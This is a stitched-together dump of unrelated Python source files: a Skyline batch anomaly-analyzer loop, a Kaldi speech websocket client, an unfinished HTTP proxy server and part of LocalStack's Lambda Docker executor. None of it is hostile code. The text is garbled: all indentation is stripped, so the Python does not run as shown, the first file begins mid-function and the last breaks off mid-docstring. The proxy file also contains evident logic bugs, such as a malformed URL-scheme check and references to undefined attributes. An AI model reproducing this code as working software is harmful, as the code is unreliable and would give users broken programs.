SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
logger.info('SERVER_METRIC_PATH is set from settings.py to %s' % str(SERVER_METRIC_PATH))
except:
SERVER_METRIC_PATH = ''
logger.info('warning :: SERVER_METRIC_PATH is not declared in settings.py, defaults to \'\'')
logger.info('skyline_app_graphite_namespace is set to %s' % str(skyline_app_graphite_namespace))
try:
ANALYZER_ENABLED = settings.ANALYZER_ENABLED
logger.info('ANALYZER_ENABLED is set to %s' % str(ANALYZER_ENABLED))
except:
ANALYZER_ENABLED = True
logger.info('warning :: ANALYZER_ENABLED is not declared in settings.py, defaults to True')
if not os.path.exists(settings.SKYLINE_TMP_DIR):
# @modified 20160803 - Adding additional exception handling to Analyzer
try:
mkdir_p(settings.SKYLINE_TMP_DIR)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to create %s' % settings.SKYLINE_TMP_DIR)
while 1:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
except:
logger.error(traceback.format_exc())
logger.error('error :: Analyzer cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
try:
self.redis_conn = get_redis_conn(skyline_app)
except:
logger.error(traceback.format_exc())
# logger.error('error :: Analyzer cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
logger.error('error :: Analyzer cannot connect to get_redis_conn')
continue
try:
self.redis_conn_decoded.ping()
except:
logger.error(traceback.format_exc())
logger.error('error :: Analyzer batch cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
try:
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
except:
logger.error(traceback.format_exc())
# logger.error('error :: Analyzer cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
logger.error('error :: Analyzer batch cannot connect to get_redis_conn')
continue
"""
Determine if any metric has been added to process
"""
while True:
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, int(now))
except:
logger.error(traceback.format_exc())
logger.error('error :: Analyzer batch could not update the Redis %s key' % skyline_app)
# Discover metrics to analyze
analyzer_batch_work = None
redis_set = 'analyzer.batch'
try:
analyzer_batch_work = self.redis_conn_decoded.smembers(redis_set)
except Exception as e:
logger.error('error :: could not query Redis for set %s - %s' % (redis_set, e))
if analyzer_batch_work:
analyzer_batch_work_queue_items = len(analyzer_batch_work)
if analyzer_batch_work_queue_items > 0:
logger.info('there are %s metrics to process in the %s Redis set' % (
str(analyzer_batch_work_queue_items), redis_set))
break
else:
logger.info('there are no batch metrics to process')
sleep(1)
metric_name = None
last_analyzed_timestamp = None
for index, analyzer_batch in enumerate(analyzer_batch_work):
try:
batch_processing_metric = literal_eval(analyzer_batch)
metric_name = str(batch_processing_metric[0])
last_analyzed_timestamp = int(batch_processing_metric[1])
break
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine details from analyzer_batch entry')
metric_name = None
last_analyzed_timestamp = None
batch_processing_metric = None
sleep(1)
# @added 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# If multiple work items exist sort them by oldest timestamp and
# process the item with the oldest timestamp first
if analyzer_batch_work:
unsorted_analyzer_batch_work = []
for index, analyzer_batch in enumerate(analyzer_batch_work):
try:
batch_processing_metric = literal_eval(analyzer_batch)
metric_name = str(batch_processing_metric[0])
last_analyzed_timestamp = int(batch_processing_metric[1])
unsorted_analyzer_batch_work.append([metric_name, last_analyzed_timestamp])
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine details from analyzer_batch entry')
sorted_analyzer_batch_work = sorted(unsorted_analyzer_batch_work, key=lambda x: x[1])
logger.info('there are %s work items in the sorted_analyzer_batch_work list' % (str(len(sorted_analyzer_batch_work))))
# @added 20201017 - Feature #3818: ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED
# Remove multiple entries for metrics and only add the latest
# timestamp item per metric
original_work_queue_length = len(sorted_analyzer_batch_work)
metrics = list(set([item[0] for item in sorted_analyzer_batch_work]))
logger.info('there are %s unique metrics with work items in the sorted_analyzer_batch_work list' % (str(len(metrics))))
if len(metrics) < original_work_queue_length:
new_analyzer_batch_work = []
for metric in metrics:
work_timestamps = []
for item in sorted_analyzer_batch_work:
if item[0] == metric:
timestamp = item[1]
work_timestamps.append(timestamp)
new_analyzer_batch_work.append([metric, timestamp])
if len(work_timestamps) > 1:
last_work_timestamp = work_timestamps[-1]
for work_timestamp in work_timestamps:
if work_timestamp != last_work_timestamp:
# Remove from work list
redis_set = 'analyzer.batch'
data = [metric, int(work_timestamp)]
try:
self.redis_conn.srem('analyzer.batch', str(data))
logger.info('analyzer_batch :: newer work exists, removed older work item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove older work item - %s - from Redis set - %s' % (str(data), redis_set))
sorted_analyzer_batch_work = sorted(new_analyzer_batch_work, key=lambda x: x[1])
new_work_queue_length = len(sorted_analyzer_batch_work)
if original_work_queue_length != new_work_queue_length:
pruned_item_count = original_work_queue_length - new_work_queue_length
logger.info('the analyzer.batch Redis set was pruned of %s older items which have newer work items' % str(pruned_item_count))
metric_name = str(sorted_analyzer_batch_work[0][0])
last_analyzed_timestamp = int(sorted_analyzer_batch_work[0][1])
batch_processing_metric = [metric_name, last_analyzed_timestamp]
if not metric_name:
break
# @added 20200904 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Task #3730: Validate Mirage running multiple processes
# Remove any existing algorithm.error and timing files from any
# previous runs
pattern = '%s.*.algorithm.error' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
logger.info('cleaning up old error file - %s' % (str(f)))
except OSError:
pass
except:
logger.error('error :: failed to cleanup algorithm.error files')
logger.info(traceback.format_exc())
pattern = '%s.*.algorithm.timings' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
logger.info('cleaning up old timings file - %s' % (str(f)))
except OSError:
pass
except:
logger.error('error :: failed to cleanup algorithm.timing files')
logger.info(traceback.format_exc())
logger.info('processing - %s' % str(batch_processing_metric))
# Spawn processes
batch_pids = []
spawned_batch_pids = []
batch_pid_count = 0
run_timestamp = now
for i in range(1, 2):
if BATCH_MODE:
batch_p = Process(target=self.spin_batch_process, args=(i, run_timestamp, 'batch_mode', 0, sorted_analyzer_batch_work[0:300]))
else:
batch_p = Process(target=self.spin_batch_process, args=(i, run_timestamp, metric_name, last_analyzed_timestamp))
batch_pids.append(batch_p)
batch_pid_count += 1
logger.info('starting 1 of %s spin_batch_process' % (str(batch_pid_count)))
batch_p.start()
spawned_batch_pids.append(batch_p.pid)
# Send wait signal to zombie processes
# for p in pids:
# p.join()
# Self monitor processes and terminate if any spin_batch_process
# that has run for longer than 300 seconds
p_starts = time()
while time() - p_starts <= 300:
if any(p.is_alive() for p in batch_pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('1 spin_batch_process completed in %.2f seconds' % (time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all spin_batch_process processes')
for p in batch_pids:
p.terminate()
# p.join()
for p in batch_pids:
if p.is_alive():
logger.info('stopping spin_process - %s' % (str(p.is_alive())))
p.join()
# Grab data from the queue and populate dictionaries
exceptions = dict()
anomaly_breakdown = dict()
while 1:
try:
key, value = self.batch_anomaly_breakdown_q.get_nowait()
if key not in anomaly_breakdown.keys():
anomaly_breakdown[key] = value
else:
anomaly_breakdown[key] += value
except Empty:
break
while 1:
try:
key, value = self.batch_exceptions_q.get_nowait()
if key not in exceptions.keys():
exceptions[key] = value
else:
exceptions[key] += value
except Empty:
break
# @added 20200904 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Task #3730: Validate Mirage running multiple processes
# Report any algorithm errors
pattern = '%s.*.algorithm.error' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
algorithm_error_file = os.path.join(settings.SKYLINE_TMP_DIR, f)
if os.path.isfile(algorithm_error_file):
logger.error('error :: error reported in %s' % (
algorithm_error_file))
try:
with open(algorithm_error_file, 'r') as f:
error_string = f.read()
logger.error('%s' % str(error_string))
except:
logger.error('error :: failed to read error file - %s' % algorithm_error_file)
try:
os.remove(algorithm_error_file)
except OSError:
pass
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check algorithm errors')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check algorithm errors')
# @added 20191021 - Bug #3288: Always send anomaly_breakdown and exception metrics
# Branch #3262: py3
exceptions_metrics = ['Boring', 'Stale', 'TooShort', 'Other']
try:
for i_exception in exceptions_metrics:
if i_exception not in exceptions.keys():
exceptions[i_exception] = 0
# @added 20200607 - Feature #3566: custom_algorithms
anomaly_breakdown_algorithms = list(settings.ALGORITHMS)
if CUSTOM_ALGORITHMS:
for custom_algorithm in settings.CUSTOM_ALGORITHMS:
anomaly_breakdown_algorithms.append(custom_algorithm)
# @modified 20200607 - Feature #3566: custom_algorithms
# for i_anomaly_breakdown in settings.ALGORITHMS:
for i_anomaly_breakdown in anomaly_breakdown_algorithms:
if i_anomaly_breakdown not in anomaly_breakdown.keys():
anomaly_breakdown[i_anomaly_breakdown] = 0
exceptions_string = ''
for i_exception in exceptions.keys():
if exceptions_string == '':
exceptions_string = '%s: %s' % (str(i_exception), str(exceptions[i_exception]))
else:
exceptions_string = '%s, %s: %s' % (exceptions_string, str(i_exception), str(exceptions[i_exception]))
logger.info('exceptions - %s' % str(exceptions_string))
anomaly_breakdown_string = ''
if anomaly_breakdown:
for i_anomaly_breakdown in anomaly_breakdown.keys():
if anomaly_breakdown_string == '':
anomaly_breakdown_string = '%s: %s' % (str(i_anomaly_breakdown), str(anomaly_breakdown[i_anomaly_breakdown]))
else:
anomaly_breakdown_string = '%s, %s: %s' % (anomaly_breakdown_string, str(i_anomaly_breakdown), str(anomaly_breakdown[i_anomaly_breakdown]))
logger.info('anomaly_breakdown - %s' % str(anomaly_breakdown_string))
else:
logger.info('anomaly_breakdown - none, no anomalies')
except:
logger.error(traceback.format_exc())
logger.error('error :: could not exceptions and anomaly_breakdown details')
try:
del exceptions
except:
pass
try:
del anomaly_breakdown
except:
pass
try:
with self.batch_exceptions_q.mutex:
self.batch_exceptions_q.queue.clear()
except:
pass
try:
with self.batch_anomaly_breakdown_q.mutex:
self.batch_anomaly_breakdown_q.queue.clear()
except:
pass
|
client.py
|
__author__ = 'tanel'
import argparse
from ws4py.client.threadedclient import WebSocketClient
import time
import threading
import sys
import urllib
import queue as Queue
#from multiprocessing import Queue
import json
import time
import os
def rate_limited(maxPerSecond):
minInterval = 1.0 / float(maxPerSecond)
def decorate(func):
lastTimeCalled = [0.0]
def rate_limited_function(*args,**kargs):
elapsed = time.clock() - lastTimeCalled[0]
leftToWait = minInterval - elapsed
if leftToWait>0:
time.sleep(leftToWait)
ret = func(*args,**kargs)
lastTimeCalled[0] = time.clock()
return ret
return rate_limited_function
return decorate
class MyClient(WebSocketClient):
def __init__(self, audiofile, url, protocols=None, extensions=None, heartbeat_freq=None, byterate=32000,
save_adaptation_state_filename=None, send_adaptation_state_filename=None):
super(MyClient, self).__init__(url, protocols, extensions, heartbeat_freq)
self.final_hyps = []
self.audiofile = audiofile
self.byterate = byterate
self.final_hyp_queue = Queue.Queue()
self.save_adaptation_state_filename = save_adaptation_state_filename
self.send_adaptation_state_filename = send_adaptation_state_filename
@rate_limited(4)
def send_data(self, data):
self.send(data, binary=True)
def opened(self):
print("Socket opened!")
def send_data_to_ws():
if self.send_adaptation_state_filename is not None:
#print >> sys.stderr, "Sending adaptation state from %s" % self.send_adaptation_state_filename
try:
adaptation_state_props = json.load(open(self.send_adaptation_state_filename, "r"))
self.send(json.dumps(dict(adaptation_state=adaptation_state_props)))
except:
e = sys.exc_info()[0]
#print >> sys.stderr, "Failed to send adaptation state: ", e
with self.audiofile as audiostream:
for block in iter(lambda: audiostream.read(self.byterate/4), ""):
self.send_data(block)
#print >> sys.stderr, "Audio sent, now sending EOS"
self.send("EOS")
t = threading.Thread(target=send_data_to_ws)
t.start()
def received_message(self, m):
response = json.loads(str(m))
#print >> sys.stderr, "RESPONSE:", response
#print >> sys.stderr, "JSON was:", m
if response['status'] == 0:
if 'result' in response:
trans = response['result']['hypotheses'][0]['transcript'].encode('utf-8')
if response['result']['final']:
#print >> sys.stderr, trans,
self.final_hyps.append(trans)
#print >> sys.stderr, '\r%s' % trans.replace("\n", "\\n")
else:
print_trans = trans.replace("\n", "\\n")
if len(print_trans) > 80:
print_trans = "... %s" % print_trans[-76:]
#print >> sys.stderr, '\r%s' % print_trans,
if 'adaptation_state' in response:
if self.save_adaptation_state_filename:
#print >> sys.stderr, "Saving adaptation state to %s" % self.save_adaptation_state_filename
with open(self.save_adaptation_state_filename, "w") as f:
f.write(json.dumps(response['adaptation_state']))
else:
#print >> sys.stderr, "Received error from server (status %d)" % response['status']
if 'message' in response:
print("Error message:", response['message'])
#print >> sys.stderr, "Error message:", response['message']
def get_full_hyp(self, timeout=60):
return self.final_hyp_queue.get(timeout)
def closed(self, code, reason=None):
#print "Websocket closed() called"
#print >> sys.stderr
self.final_hyp_queue.put(" ".join(self.final_hyps))
def main(file_bytes, rate=3200):
port = os.environ['GSTREAM_PORT']
uri = 'ws://' + os.environ['ASR_SERVER']+':'+str(port) + '/client/ws/speech'
'''parser = argparse.ArgumentParser(description='Command line client for kaldigstserver')
parser.add_argument('-u', '--uri', default="ws://localhost:8888/client/ws/speech", dest="uri", help="Server websocket URI")
parser.add_argument('-r', '--rate', default=32000, dest="rate", type=int, help="Rate in bytes/sec at which audio should be sent to the server. NB! For raw 16-bit audio it must be 2*samplerate!")
parser.add_argument('--save-adaptation-state', help="Save adaptation state to file")
parser.add_argument('--send-adaptation-state', help="Send adaptation state from file")
parser.add_argument('--content-type', default='', help="Use the specified content type (empty by default, for raw files the default is audio/x-raw, layout=(string)interleaved, rate=(int)<rate>, format=(string)S16LE, channels=(int)1")
parser.add_argument('audiofile', help="Audio file to be sent to the server", type=argparse.FileType('rb'), default=sys.stdin)
args = parser.parse_args()'''
content_type = ''
'''if content_type == '' and args.audiofile.name.endswith(".raw"):
content_type = "audio/x-raw, layout=(string)interleaved, rate=(int)%d, format=(string)S16LE, channels=(int)1" %(args.rate/2)'''
ws = MyClient(file_bytes, uri + '?%s' % (urllib.parse.urlencode([("content-type", content_type)])), byterate=rate)
ws.connect()
result = ws.get_full_hyp()
print(result, flush=True)
|
proxyserver.py
|
#!/usr/bin/env python3
import socket
from types import ModuleType
import sys
import threading
import logging
from collections import OrderedDict, namedtuple
import asyncio
import errno
import base64
HOST = "127.0.0.1"
PORT = 9995
LISTEN = 10
FAILURE = 1
MAX_REQUEST_BYTES = 8192 # HTTP 1.1
logging.basicConfig(format='[%(asctime)s] %(message)s',
level=logging.INFO,
datefmt='%Y-%m-%d %H:%M:%S')
class DestinationRequired(Exception):
pass
class PortInUseException(Exception):
pass
class Socket(socket.socket):
def __init__(self, *args, **kwargs):
super(Socket, self).__init__(*args, **kwargs)
self.sock = None
def tcp_socket(self):
self.sock = Socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return self.sock
def settimeout(self, value):
if value > 30:
raise ValueError(
'Set max timeout 30 seconds.'
)
return super().settimeout(value)
def udp_socket(self):
raise NotImplementedError(
'implement `udp_socket` if needed'
)
class AsyncTCPConnection(Socket):
__listen = 10
def __init__(self, host, port):
self.host = host
try:
self.port = int(port)
except ValueError:
sys.stderr.write('Port should be an integer!\nConnection abort')
sys.exit(1)
async def __aenter__(self):
try:
self.tcp_socket.bind((self.host, self.port))
self.tcp_socket.listen(self.__listen)
self.settimeout(20)
logging.info(f"Listening on {self.host}:{self.port}")
return self.tcp_socket
except socket.error as err:
# just catch the errors which caused by
# invalid address, insufficient port permisstions
# raise error with clear message
# Ignore others errors as no need to catch exception, just raise it.
if err.errno == errno.EACCES:
msg = 'Pemission denied! Run the script as an administrator'
raise DestinationRequired(msg)
elif err.errno == errno.EADDRINUSE:
msg = 'Port already in use! Change or kill the running port.'
raise PortInUseException(msg)
else:
raise err
async def __aexit__(self, *args):
if self.tcp_socket:
logging.info("Closing connection")
self.tcp_socket.__exit__(*args)
class InvalidRequest(Exception):
pass
class DNSLookupError(Exception):
pass
class BaseRequest:
_methods = OrderedDict({
'get':'GET',
'post':'POST',
'put':'PUT',
'delete':'DELETE',
'connect': 'CONNECT'
})
def __init__(self, request, acsii=None):
self.header = None
self._encoding = acsii if acsii else 'utf-8'
self._request = request
def get_headers(self):
return self._request.decode(self._encoding).split('\r\n')
def gethostbyname(self, host):
try:
return socket.gethostbyname(host)
except socket.error:
raise DNSLookupError(
'Cannot resolve ip address! Dns lookup failed.'
)
def scheme(self):
raise NotImplementedError()
def encoding(self):
return self._encoding
@property
def method(self):
return self._methods.get(self.getmethod().lower(), None)
class Request(BaseRequest):
"""
TODO: Handles request, prepare headers, Auth, cookies and etc.
"""
def __init__(self, request, scheme='basic', decode=base64.b64decode):
super().__init__(request)
self.auth_scheme = scheme
self.decode = decode
self._requestline = namedtuple('Line', 'method url protocol')
def headers(self) -> list:
try:
return self.get_headers()
except Exception as decode_error:
raise decode_error(
f'Used encoding {self.encoding}'
)
@property
def extract_request_line(self):
method, url, protocol, rm = str(self.headers[0]).split()
return self._requestline(method, url, protocol)
def getmethod(self):
return self.extract_request_line.method
@property
def geturl(self):
url = self.extract_request_line.url.split('://')[-1]
remote_url = url.split(':')
if len(remote_url) == 2:
host, port = remote_url
return (str(host), int(port))
elif len(remote_url) == 1:
return (str(remote_url[0]), None)
else:
return (str(url), None)
def get_auth(self):
proxy_auth = None
for string in self.headers:
if 'Proxy-Authorization' in string:
proxy_auth = string
break
if not proxy_auth:
return False
return proxy_auth.split()
def auth_scheme(self):
assert self.get_auth() > 2
assert self.get_auth[1].lower() == self.auth_scheme, (
'Unsupported auth scheme.'
)
def formatted(self):
method = self.extract_request_line.method
url = self.extract_request_line.url
protocol = self.extract_request_line.url
if 'http' in protocol.lower():
protocol = 'HTTP/1.1'
if not 'http' or 'https' in str(url):
if url.startswith('www'):
url = f'https://{url}'
else:
url = f'https://www.{url}'
host, _ =self.geturl
client_rq = f'{method} {url} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: python-requests/2.22.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n'
return client_rq.encode('utf-8')
def credentials(self):
crd = self.get_auth()[-1]
try:
return self.base64_decode(crd)
except Exception:
return (None,
None)
def base64_decode(self, data):
try:
data = self.decode(data).decode()
except UnicodeDecodeError:
pass
username, password, *rm = data.split(':')
return (
username,
password,
)
def auth_check(self):
pass
class ProxyServer:
def __init__(self, host, port):
self.host = host
self.port = port
self.sock = None
def send(self):
pass
def connect(self):
pass
def proxy_handler(self, client_socket):
request = client_socket.recv(MAX_REQUEST_BYTES)
r = Request(
request=request
)
if not r.method:
raise InvalidRequest(
f'{r.getmethod()} not allowed'
)
host, port = r.geturl
if not port:
port = 80
request = r.formatted()
ip = None
try:
ip = socket.gethostbyname(host)
except socket.error:
raise DNSLookupError
assert ip, (
'Cannot resolve ip address.'
)
# Remote server socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.sendall(request)
while True:
data = s.recv(4096)
if (len(data) > 0):
client_socket.send(data)
else:
break
async def _runprocess(self):
async with AsyncTCPConnection(host=self.host, port=self.port) as connection:
terminate = False
while not terminate:
client, _ = connection.accept()
d = threading.Thread(target=self.proxy_handler, args=(client, ))
d.setDaemon(True)
d.start()
def start(self):
self.loop.run_until_complete(self._runprocess())
|
lambda_executors.py
|
import os
import re
import json
import time
import logging
import threading
import subprocess
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils.aws import aws_stack
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file,
to_str, run, cp_r, json_safe, get_free_tcp_port)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_RUNTIME_PYTHON27 = 'python2.7'
LAMBDA_RUNTIME_PYTHON36 = 'python3.6'
LAMBDA_RUNTIME_NODEJS = 'nodejs'
LAMBDA_RUNTIME_NODEJS610 = 'nodejs6.10'
LAMBDA_RUNTIME_NODEJS810 = 'nodejs8.10'
LAMBDA_RUNTIME_NODEJS10X = 'nodejs10.x'
LAMBDA_RUNTIME_JAVA8 = 'java8'
LAMBDA_RUNTIME_DOTNETCORE2 = 'dotnetcore2.0'
LAMBDA_RUNTIME_DOTNETCORE21 = 'dotnetcore2.1'
LAMBDA_RUNTIME_GOLANG = 'go1.x'
LAMBDA_RUNTIME_RUBY = 'ruby'
LAMBDA_RUNTIME_RUBY25 = 'ruby2.5'
LAMBDA_RUNTIME_CUSTOM_RUNTIME = 'provided'
LAMBDA_EVENT_FILE = 'event_file.json'
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the _execute method """
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def execute(self, func_arn, func_details, event, context=None, version=None, asynchronous=False):
def do_execute(*args):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
try:
result, log_output = self._execute(func_arn, func_details, event, context, version)
finally:
self.function_invoke_times[func_arn] = invocation_time
# forward log output to cloudwatch logs
self._store_logs(func_details, log_output, invocation_time)
# return final result
return result, log_output
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug('Lambda executed in Event (asynchronous) mode, no response from this '
'function will be returned to caller')
FuncThread(do_execute).start()
return None, 'Lambda executed asynchronously.'
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
""" This method must be overwritten by subclasses. """
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
def _store_logs(self, func_details, log_output, invocation_time):
if not aws_stack.is_service_enabled('logs'):
return
logs_client = aws_stack.connect_to_service('logs')
log_group_name = '/aws/lambda/%s' % func_details.name()
time_str = time.strftime('%Y/%m/%d', time.gmtime(invocation_time))
log_stream_name = '%s/[$LATEST]%s' % (time_str, short_uid())
# make sure that the log group exists
log_groups = logs_client.describe_log_groups()['logGroups']
log_groups = [lg['logGroupName'] for lg in log_groups]
if log_group_name not in log_groups:
try:
logs_client.create_log_group(logGroupName=log_group_name)
except Exception as e:
if 'ResourceAlreadyExistsException' in str(e):
# this can happen in certain cases, possibly due to a race condition
pass
else:
raise e
# create a new log stream for this lambda invocation
logs_client.create_log_stream(logGroupName=log_group_name, logStreamName=log_stream_name)
# store new log events under the log stream
invocation_time = invocation_time
finish_time = int(time.time() * 1000)
log_lines = log_output.split('\n')
time_diff_per_line = float(finish_time - invocation_time) / float(len(log_lines))
log_events = []
for i, line in enumerate(log_lines):
if not line:
continue
# simple heuristic: assume log lines were emitted in regular intervals
log_time = invocation_time + float(i) * time_diff_per_line
event = {'timestamp': int(log_time), 'message': line}
log_events.append(event)
if not log_events:
return
logs_client.put_log_events(
logGroupName=log_group_name,
logStreamName=log_stream_name,
logEvents=log_events
)
def run_lambda_executor(self, cmd, event=None, env_vars={}):
process = run(cmd, asynchronous=True, stderr=subprocess.PIPE, outfile=subprocess.PIPE, env_vars=env_vars,
stdin=True)
result, log_output = process.communicate(input=event)
result = to_str(result).strip()
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if '\n' in result:
additional_logs, _, result = result.rpartition('\n')
log_output += '\n%s' % additional_logs
if return_code != 0:
raise Exception('Lambda process returned error status code: %s. Output:\n%s' %
(return_code, log_output))
return result, log_output
class ContainerInfo:
"""
Contains basic information about a docker container.
"""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
raise Exception('Not implemented')
def _docker_cmd(self):
""" Return the string to be used for running Docker commands. """
return config.DOCKER_CMD
def prepare_event(self, environment, event_body):
""" Return the event as a stdin string. """
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body
return None
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = func_details.envvars.copy()
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
docker_host = config.DOCKER_HOST_FROM_CONTAINER
environment['HOSTNAME'] = docker_host
environment['LOCALSTACK_HOSTNAME'] = docker_host
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
# custom command to execute in the container
command = ''
# if running a Java Lambda, set up classpath arguments
if runtime == LAMBDA_RUNTIME_JAVA8:
java_opts = Util.get_java_opts()
stdin = None
# copy executor jar into temp directory
target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
if not os.path.exists(target_file):
cp_r(LAMBDA_EXECUTOR_JAR, target_file)
# TODO cleanup once we have custom Java Docker image
taskdir = '/var/task'
save_file(os.path.join(lambda_cwd, LAMBDA_EVENT_FILE), event_body)
command = ("bash -c 'cd %s; java %s -cp \".:`ls *.jar | tr \"\\n\" \":\"`\" \"%s\" \"%s\" \"%s\"'" %
(taskdir, java_opts, LAMBDA_EXECUTOR_CLASS, handler, LAMBDA_EVENT_FILE))
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_arn, environment, runtime, command, handler, lambda_cwd)
# lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
LOG.debug('Running lambda cmd: %s' % cmd)
result, log_output = self.run_lambda_executor(cmd, stdin, environment)
log_formatted = log_output.strip().replace('\n', '\n> ')
LOG.debug('Lambda %s result / log output:\n%s\n>%s' % (func_arn, result.strip(), log_formatted))
return result, log_output
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(runtime, func_arn, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
docker_cmd = self._docker_cmd()
event_file = os.path.join(lambda_cwd, LAMBDA_EVENT_FILE)
if not has_been_invoked_before:
# if this is the first invocation: copy the entire folder into the container
copy_command = '%s cp "%s/." "%s:/var/task";' % (docker_cmd, lambda_cwd, container_info.name)
elif os.path.exists(event_file):
# otherwise, copy only the event file if it exists
copy_command = '%s cp "%s" "%s:/var/task";' % (docker_cmd, event_file, container_info.name)
cmd = (
'%s'
' %s exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)
return cmd
def startup(self):
self.cleanup()
# start a process to remove idle containers
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, runtime, func_arn, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
:param runtime: Lamda runtime environment. python2.7, nodejs6.10, etc.
:param func_arn: The ARN of the lambda function.
